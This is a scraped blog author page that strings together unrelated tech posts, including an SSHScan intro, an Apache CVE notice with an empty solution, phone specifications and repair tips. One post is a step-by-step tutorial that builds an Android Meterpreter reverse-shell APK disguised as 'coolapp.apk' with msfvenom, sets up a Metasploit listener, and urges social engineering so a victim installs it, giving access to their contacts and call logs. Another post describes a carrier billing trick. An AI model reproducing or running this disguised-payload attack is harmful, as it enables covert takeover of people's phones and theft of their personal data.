Author: topfomuser

Home / Author: topfomuser

Pentester Tools : SSHScan

April 10, 2018 | Hacker News | 2 Comments

    SSHScan is a testing tool that enumerates SSH Ciphers. We Can easily detect weak ciphers by using this . 



Lets tryout SSHScan in BrokenWeb (A Vulnerable machine) hosted locally .

Brokenweb IP : 192.168.3.107

codebreaker@zbox:~$ ./SSHScan/sshscan.py -t 192.168.3.107:22

 In Network Pentesting, Once you detect an SSH port , then try for SSHScan to detect the ciphers. If KEX algoritham is weak then an attacker can easily create a Denial of Service attack on SSH port and hence the target wont be accessible by the anyone at the moment.

GITHUB Link:
https://github.com/evict/SSHScan

Installation :
git clone https://github.com/evict/SSHScan 

 

If your server is running with an apache 2.4.7 , then the chance for being hacked is high . Listing two solutions to solve this issue .

Description:

An attacker able to access a public server status page on a server using a threaded MPM could send a carefully crafted request which could lead to a heap buffer overflow. Note that it is not a default or recommended configuration to have a public accessible server status page.

Proof:

  • Running HTTP service
  • Product HTTPD exists — Apache HTTPD 2.4.7
  • Vulnerable version of product HTTPD found — Apache HTTPD 2.4.7


Vulnerability ID
: apache-httpd-cve-2014-0226

Solution:

Disclaimer: Hacking other devices on Wireless Networks (Wi-Fi) without explicit written permission is illegal, unless you are the legal owner of the devices you want to hack and the wireless network.

Its just a simple Trick. All you need is our dear metasploit, and a bit of social engineering skills.
Here my ip is 192.168.1.33 and the system i am going to hack is of ip 192.168.1.34
Open a terminal(as root-sudo terminator), and put in:
msfvenom -p android/meterpreter/reverse_tcp LHOST=(your lan ip address) LPORT=8080 R > /home/root/coolapp.apk
eg : msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.33 LPORT=8080 R > /home/root/coolapp.apk 
This command should give you a file called coolapp.apk on the desktop. Now we need to set up a listener so that when the target opens the app, we have their android hacked. 😀
Open the metasploit console by typing “msfconsole” & Type : 
use exploit/multi/handler
Hit return and follow as I do 1by1.

set payload android/meterpreter/reverse_tcp

set lhost (your lan ip address)
set lport 8080

Hit enter, Now use some social engineering tricks like sending them a mail or send via  bluetooth to give the file on the desktop titled, coolapp.apk, to someone who will open(click on install>&open) it on their android phone. Once you have given the app and they are about to open it, go back to your metasploit console and type:

exploit
This should open a connection soon with the target android phone where you can access a lot of features of that phone like Contacts,Call log, and many more .

Feel free to comment here if you face any problems .
All the best.

JailBreak APPLE iOS 8.1.3

March 2, 2015 | Mobile Center | No Comments

JailBreaking iOS 8.1.3 is currently an impossible task reported by most of the famous jailbreakers .Eventhough you can have a try with 2 different methods .


1) Download and Install iOS 8.2 Beta and Jailbreak.
2) Downgrade the iOS to 8.1.2.
Be careful while trying the 2 options because at any time apple may stop signing to 8.1.2 & 8.2 beta. so confirm it before restoring .

Airtel Hack to get 750MB for 30 Days 

Want to get a one month 2G Net 750MB at just rupees 33 ?? 
#Follow the steps below




1) Send a msg  “NET” to 121

   you will get a reply from “unknown number”*but give reply to 121


2)Reply “2” to 121 

3)Reply “00” to 121 for selecting the option more

Option 11 ) 750MB 2G + 150MB @33/15days









4)Reply”11″ and confirm the msg by replying “1” to 121


 It will be shown as 15days but after the activation you will get 30 days validity.


Asus Zenfone 2

January 6, 2015 | Mobile Center | No Comments

Asus ZenFone 2 is powered by an up to 2.3 GHz 64-bit Intel Atom processor Z3580 and has 4 GB RAM to deliver up to seven times (7X)* faster gaming performance than its predecessor, so you’ll enjoy slick web surfing, smooth video playback, great gaming experiences and multi-tasking that doesn’t leave you waiting.



Specification
ZE551ML
Processor 64-bit Intel Atom Z3560/Z3580 Quad Core Processor (Running at 1.8/2.3GHz) PowerVR Series 6 – G6430, with OpenGL 3.0 support

Operating System Brand-new ASUS ZenUI with Android 5.0 Lollipop

Memory Storage LPDDR3 2GB/4GB RAM/Micro SD card support, up to 64GB
16GB/32GB/64GB ROM ASUS WebStorage 5GB (lifetime)

Display 5.5-inch, 1920 x 1080 (Full HD), 403ppi IPS display/400nits brightness/ Corning® Gorilla® Glass 3
PixelMaster Cameras

Front: 5MP, f/2.0-aperture, wide-angle (85-degree) lens with Selfie Panorama
Rear: 13MP, f/2.0-aperture, 5-element, auto-focus lens with dual-color Real Tone flash
PixelMaster features: Low Light mode / Backlight (HDR) mode / Enhanced Beautification mode / Manual mode / Zero shutter lag

Network

LTE speed: Category 4 maximum: 150Mbit/s / DL: 50Mbit/s
4G band: FDD LTE: 1/2/3/4/5/7/8/9/17/18/19/20/28/29
TDD LTE: 38/39/40/41(Network support varies by country)

Battery

3000mAh lithium-polymer, Fast-charging technology
Sensor Accelerometer, proximity, ambient-light, gyroscopic, digital compass and Hall-effect sensors

Navigation

GPS / A-GPS / GLONASS

Wireless

802.11ac, Wi-Fi Direct, Bluetooth 4.0, NFC

Ports

3.5mm audio jack, dual micro-SIM, micro USB (support OTG)

Color

Glacier Gray / Osmium Black / Glamour Red / Ceramic White / Sheer Gold

Dimensions

152.5 x 77.2 x 10.9 ~ 3.9 mm

Weight

170g

Exp.Release on March 2014 .

   

     mCent is a website which gives free recharges for installing apps they recommend.You can use it either via your android phone or by using bluestacks though your pc.

1) Click the link below.

2) Register for mCent.
3) Install the mCent app on your phone and      login with login info

4) Install the Recommended apps and recharge your phone.

Wanna try with your pc ?

1) Install the BlueStacks Application in your pc

2) Login with your google account to playstore
3) Repeat the steps above

&&%%%%—-     For any Assistance feel free to contact. —-&&&%%%%

Whatapp on Tablet without SIM

August 15, 2014 | Uncategorized | No Comments

                  If you own a smart phone then you are definitely using Whatsapp messenger :). Whatsapp is a free messaging app for the smartphone world which you can send text messages and media files like images, audio files and video files. Whatsapp requires an smartphone with SIM support. Also you require a working phone number to use it. Whatsapp currently doesn’t support tablets, but in this tutorial I will teach you to install Whatsapp on android tablets. The tablets can be Wi-Fi only android tablet or android tablet having SIM support. But do not worry as the this tutorial for installing Whatsapp on tablets will work on both types of tablets like Gallaxy 3, Galaxy Tab Pro 12.2 SM-T900, Galaxy Tab 4, Galaxy Tab Pro 10.1 SM-T520 and all other tablets.

Install Whatsapp On Wi-Fi Only Tablets With No SIM Support

  • Downlaod and Install the latest version of Whatsapp for android here.
  • Now install the app. If install is blocked enable unknown sources. Then re-install the app.
  • Now after installing the app, open it. When you open it you will see a welcome screen. Click the ‘Agree and continue’ button.
  • When you click this button a note will open stating that “tablets are currently not supported.”. Click OK to begin the setup.
  • On the next screen you need to enter your phone number and choose the right country where you lives in.
  • Enter the phone number which you use often. Do not enter your friend’s phone number.
  • After entering the phone number click OK.
  • When you click OK a popup will open asking you to verify your phone number. Click OK again.

  • Whatsapp will automatically try to send a sms to the number specified by you. But after few minutes the sms verification will fail.
  • Now you will have to verify your number via voice call. Click the ‘Call me’ button to receive a voice call on that number. Hear the 6 digit verification code carefully. Enter this code in Whatsapp to verify your phone number. 

  • Now enter your name for Whatsapp profile and follow the instructions by clicking the ‘Next’ button on top right.
Now you have successfully installed Whatsapp on Wi-Fi  tablets with no SIM support. To add contacts in Whatsapp just save the contacts list on your tablet and refresh the list in Whatsapp. Now you will need a working data network for sending and receiving messages on Whatsapp. You can use your smart phone’s network on your tablet via Wi-Fi hotspot. Now Whatsapp will work on your tablet.


If you encounter any problem while installing Whatsapp on tablet then feel free to ask via comments.

          A common problem in the iPhone 4S, sometimes the Wi-Fi button will be grayed out and unclickable. This problem seems to be related to thermal shock—the problem may be temporarily fixed by simply putting the phone in the refrigerator for 15 minutes, or under a lamp for 30 minutes. Mine got worked for 30 minutes.

If this is the case, then the necessary permanent solution is to reflow the Murata SW SS1830010 Wi-Fi chip on the logic board. And don’t expect any other solutions will work out .Try to change this chip via any local iphone service centers .The better option will be replacing yours with a Dead iphone 4s wifi Chip.

How to fix iPhone 4s Wifi Grayed Out  ?

-Want to fix it via Heating or Cooling method (Temporary)?
 (For me it worked for 30mnts)
 * Heat it till this warning msg arrives using a hair Dryer (2mnts) & Cool it in freezer for 5mnts after putting it in a plastic Bag.(Try with your own risk 🙂 )

  https://www.youtube.com/watch?v=4mVkiU2jNSE

-FixIT Gives a Reply in this way :
  Want to Change the chip your self ?
 : http://www.ifixit.com/Guide/How+to+Fix+iPhone+4S+Wi-Fi+Grayed+Out/22167

Whats Behind the Heating Technic ??

Drastically changing temperature on electronic components causes solder joints and other connections/components like capacitors, to expand and/or contract. It is usually used as a quick way to diagnose where a problem is.

So in the 4S’s case, it may be bad solder joints, a bad capacitor or even the wifi chip (USI 339S0154)’s oscillator isn’t calibrated correctly and the change in temperature allows it to change slightly. However I haven’t looked at the datasheet to verify this.

#I Recommend you to replace the WIFI Module with a Dead Iphone ##only with the help of an expert .:) Which charged me 800 rupees in Calicut,Kerala – INDIA